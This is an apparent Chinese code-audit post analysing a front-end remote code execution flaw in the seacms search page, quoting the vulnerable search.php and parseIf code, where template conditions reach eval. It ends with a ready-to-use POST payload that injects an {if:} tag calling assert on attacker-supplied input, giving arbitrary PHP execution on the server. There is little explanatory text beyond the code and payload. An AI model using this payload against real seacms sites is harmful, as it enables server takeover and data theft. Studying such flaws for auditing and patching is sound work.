【代码审计】seacms 前台Getshell分析

 1     if(intval($searchtype)==5)
 2     {
 3         $tname = !empty($tid)?getTypeNameOnCache($tid):‘全部‘;
 4         $jq = !empty($jq)?$jq:‘全部‘;
 5         $area = !empty($area)?$area:‘全部‘;
 6         $year = !empty($year)?$year:‘全部‘;
 7         $yuyan = !empty($yuyan)?$yuyan:‘全部‘;
 8         $letter = !empty($letter)?$letter:‘全部‘;
 9         $state = !empty($state)?$state:‘全部‘;
10         $ver = !empty($ver)?$ver:‘全部‘;
11         $money = !empty($money)?$money:‘全部‘;
12         $content = str_replace("{searchpage:type}",$tid,$content);
13         $content = str_replace("{searchpage:typename}",$tname ,$content);
14         $content = str_replace("{searchpage:year}",$year,$content);
15         $content = str_replace("{searchpage:area}",$area,$content);
16         $content = str_replace("{searchpage:letter}",$letter,$content);
17         $content = str_replace("{searchpage:lang}",$yuyan,$content);
18         $content = str_replace("{searchpage:jq}",$jq,$content);
19         if($state==‘w‘){$state2="完结";}elseif($state==‘l‘){$state2="连载中";}else{$state2="全部";}
20         if($money==‘m‘){$money2="免费";}elseif($money==‘s‘){$money2="收费";}else{$money2="全部";}
21         $content = str_replace("{searchpage:state}",$state2,$content);
22         $content = str_replace("{searchpage:money}",$money2,$content);
23         $content = str_replace("{searchpage:ver}",$ver,$content);
24         $content=$mainClassObj->parsePageList($content,"",$page,$pCount,$TotalResult,"cascade");
25         $content=$mainClassObj->parseSearchItemList($content,"type");
26         $content=$mainClassObj->parseSearchItemList($content,"year");
27         $content=$mainClassObj->parseSearchItemList($content,"area");
28         $content=$mainClassObj->parseSearchItemList($content,"letter");
29         $content=$mainClassObj->parseSearchItemList($content,"lang");
30         $content=$mainClassObj->parseSearchItemList($content,"jq");
31         $content=$mainClassObj->parseSearchItemList($content,"state");
32         $content=$mainClassObj->parseSearchItemList($content,"ver");
33         $content=$mainClassObj->parseSearchItemList($content,"money");
34     }else
35     {
36         $content=$mainClassObj->parsePageList($content,"",$page,$pCount,$TotalResult,"search");
37     }
38     $content=replaceCurrentTypeId($content,-444);
39     $content=$mainClassObj->parseIf($content);
40     $content=str_replace("{seacms:member}",front_member(),$content);
41     $searchPageStr = $content;
42     echo str_replace("{seacms:runinfo}",getRunTime($t1),$searchPageStr) ;
43 }

 1 function parseIf($content){
 2         if (strpos($content,‘{if:‘)=== false){
 3         return $content;
 4         }else{
 5         $labelRule = buildregx("{if:(.*?)}(.*?){end if}","is");
 6         $labelRule2="{elseif";
 7         $labelRule3="{else}";
 8         preg_match_all($labelRule,$content,$iar);
 9         $arlen=count($iar[0]);
10         $elseIfFlag=false;
11         for($m=0;$m<$arlen;$m++){
12             $strIf=$iar[1][$m];
13             $strIf=$this->parseStrIf($strIf);
14             $strThen=$iar[2][$m];
15             $strThen=$this->parseSubIf($strThen);
16             if (strpos($strThen,$labelRule2)===false){
17                 if (strpos($strThen,$labelRule3)>=0){
18                     $elsearray=explode($labelRule3,$strThen);
19                     $strThen1=$elsearray[0];
20                     $strElse1=$elsearray[1];
21                     @eval("if(".$strIf."){\$ifFlag=true;}else{\$ifFlag=false;}");
22                     if ($ifFlag){ $content=str_replace($iar[0][$m],$strThen1,$content);} else {$content=str_replace($iar[0][$m],$strElse1,$content);}
23                 }else{
24                 @eval("if(".$strIf.") { \$ifFlag=true;} else{ \$ifFlag=false;}");
25                 if ($ifFlag) $content=str_replace($iar[0][$m],$strThen,$content); else $content=str_replace($iar[0][$m],"",$content);}
26             }else{
27                 $elseIfArray=explode($labelRule2,$strThen);
28                 $elseIfArrayLen=count($elseIfArray);
29                 $elseIfSubArray=explode($labelRule3,$elseIfArray[$elseIfArrayLen-1]);
30                 $resultStr=$elseIfSubArray[1];
31                 $elseIfArraystr0=addslashes($elseIfArray[0]);
32                 @eval("if($strIf){\$resultStr=\"$elseIfArraystr0\";}");
33                 for($elseIfLen=1;$elseIfLen<$elseIfArrayLen;$elseIfLen++){
34                     $strElseIf=getSubStrByFromAndEnd($elseIfArray[$elseIfLen],":","}","");
35                     $strElseIf=$this->parseStrIf($strElseIf);
36                     $strElseIfThen=addslashes(getSubStrByFromAndEnd($elseIfArray[$elseIfLen],"}","","start"));
37                     @eval("if(".$strElseIf."){\$resultStr=\"$strElseIfThen\";}");
38                     @eval("if(".$strElseIf."){\$elseIfFlag=true;}else{\$elseIfFlag=false;}");
39                     if ($elseIfFlag) {break;}
40                 }
41                 $strElseIf0=getSubStrByFromAndEnd($elseIfSubArray[0],":","}","");
42                 $strElseIfThen0=addslashes(getSubStrByFromAndEnd($elseIfSubArray[0],"}","","start"));
43                 if(strpos($strElseIf0,‘==‘)===false&&strpos($strElseIf0,‘=‘)>0)$strElseIf0=str_replace(‘=‘, ‘==‘, $strElseIf0);
44                 @eval("if(".$strElseIf0."){\$resultStr=\"$strElseIfThen0\";\$elseIfFlag=true;}");
45                 $content=str_replace($iar[0][$m],$resultStr,$content);
46             }
47         }
48         return $content;
49         }
50     }
51     

http://127.0.0.1/search.php?searchtype=5
POST：
searchword=d&order=}{end if}{if:1)print_r($_POST[func]($_POST[cmd]));//}{end if}&func=assert&cmd=phpinfo();{end if}{if:1)print_r($_POST[func]($_POST[cmd]));//}{end if}&fun
c=assert&cmd=phpinfo();